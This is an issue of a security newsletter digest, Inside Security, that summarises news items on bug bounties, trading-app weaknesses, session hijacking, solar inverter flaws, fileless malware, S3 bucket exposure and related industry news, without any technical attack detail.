The US DoJ recently released guidance on running bug bounties. One issue that you might not have thought about is that a bounty program researcher can have the same network traffic profile as an actual hacker, so it is important that security managers ensure they can separate the two. Before you implement any bounty program, think about these unintended security challenges. You may need to up your data protection game before you let researchers loose across your network.
-- David Strom, editor of Inside Security
Testing of various Android-based stock trading apps available for the Hong Kong exchange has revealed the majority of them contain major security weaknesses, such as the lack of MFA and vulnerable to code injection attacks. Cybersecurity incidents resulting in unauthorized trades added up to more than HK$110 million in the past year, according to officials. The report is available here.
During a session hijacking, a malicious hacker places himself in between your computer and the website’s server while you are engaged in an active session. At this point, the malicious hacker actively monitors everything that happens on your account, and can even kick you out and take control of it. Here is a blow-by-blow account of how this works. -- HEIMDAL SECURITY
An attacker could exploit vulnerabilities found in solar panel components to shut down large parts of a power grid. Security researcher Willem Westerhof found that the components (shown here), which convert direct current into alternating current, suffered from 17 vulnerabilities of different levels. The researcher has been working with the component maker since last winter to fix these issues. -- GRAHAM CLUELEY BLOG
Criminals are going to new lengths to try to disguise their malware using more advanced so-called fileless methods. This analysis dissects the operation of one piece of malware called JS_POWMET, and how it leverages registry autostart features and using other built-in Windows tools to infect a system. -- TREND MICRO BLOG
Mozilla has launched a free online service for private sharing of up to a GB of an encrypted file between two users. It’s called Send, and it’s meant to ensure users’ shared files do not remain online forever. The link will expire after a single download or 24 hours, and it works with both Firefox and Chrome browsers. -- FIREFOX
Russians have attacked in cyberspace to further their geopolitical interests, but their hacking activities also form an integral part of a more sophisticated criminal enterprise, bent on extortion and profiteering from private businesses too. Their targets have included Estonia, Georgia, Germany, and the United States (stealing data from the DNC and emails from John Podesta). You’ll need a diversity of approaches, and those approaches will have to evolve over time. The cyber threat has arrived as a clear and present risk to businesses today and addressing it will become a growing cost of doing business. -- HBR
When building red and blue teams, it’s important to ensure that candidates are willing to work in harmony and share ongoing metrics related to their activities. It is not enough to simply conduct routine penetration testing. CISOs should take a series steps in hiring a red team to go against your blue team defenses. -- SECURITY INTELLIGENCE
How do SPF and DMARC, two long-existing email security standards, stack up and complement each other? Here are the details, along with why it’s only with the addition of DMARC that SPF really functions properly as an anti-fraud tool. -- VALIMAIL BLOG
Amazon warned users with publicly accessible S3 buckets and suggested a review of the AWS S3 bucket policies, as well as the contents of the bucket, in order to avoid the exposure of sensitive data, according to a copy of the email shared by a penetration tester for HackerOne. Amazon wrote in the email: "We encourage you to promptly review your S3 buckets and their contents to ensure that you are not inadvertently making objects available to users that you don't intend." -- SEARCH SECURITY
Qualys, Inc., a provider of cloud-based security and compliance solutions, last week announced that it has entered into an asset purchase agreement with Nevis Networks to acquire their passive scanning technologies. Terms of the deal were not disclosed, said Philippe Courtot, chairman and Qualys CEO. -- QUALYS
Just for fun
Chrome is making some progress. -- MATT HOLT @ TWITTER
How likely are you to recommend Inside Security to a friend or colleague?